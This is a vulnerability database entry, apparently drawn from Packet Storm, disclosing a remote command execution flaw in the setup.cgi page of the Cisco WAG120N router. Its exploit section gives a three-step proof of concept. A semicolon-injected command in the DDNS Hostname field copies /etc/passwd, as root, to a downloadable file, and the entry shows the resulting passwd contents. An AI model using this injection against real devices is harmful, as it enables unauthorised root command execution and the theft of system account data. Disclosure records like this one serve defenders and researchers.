ID
VAR-E-201211-0596
TITLE
Cisco WAG120N Command Execution
Trust: 0.5
DESCRIPTION
Cisco WAG120N suffers from a remote command execution vulnerability in setup.cgi.
Trust: 0.5
AFFECTED PRODUCTS
vendor: | cisco | model: | wag120n | scope: | - | version: | - | Trust: 0.5 |
EXPLOIT
Hello, here you have a quick POC in three simple steps
# Remote Command Execution on Cisco WAG120N.
# (Not tested in other routers)
#
# Manuel Fernández Fernández (thesur@itsm3.com)
#
# Greetings to 2x1 crew (Alberto, Dani, Luis, Juanmi, Juanito & oca)
1º Authenticate and browse to /setup.cgi?next_file=Setup_DDNS.htm
2º All the fields you see are vulnerable to command execution as root, so
inject "qwe.com;cat /etc/passwd> /www/Routercfg.cfg;" into the Hostname
field
3º Everything is done, just download the file /Routercfg.cfg (authentication
is required)
root::0:0:root:/:/bin/sh
nobody::99:99:Nobody:/:/sbin/sh
--
Manuel Fernández
Trust: 0.5
PRICE
free
Trust: 0.5
TAGS
tag: | exploit | Trust: 0.5 |
tag: | remote | Trust: 0.5 |
tag: | cgi | Trust: 0.5 |
CREDITS
Manu
Trust: 0.5
EXTERNAL IDS
db: | PACKETSTORM | id: | 118320 | Trust: 0.5 |
SOURCES
db: | PACKETSTORM | id: | 118320 |
LAST UPDATE DATE
2022-07-27T09:32:57.334000+00:00
SOURCES RELEASE DATE
db: | PACKETSTORM | id: | 118320 | date: | 2012-11-23T17:05:54 |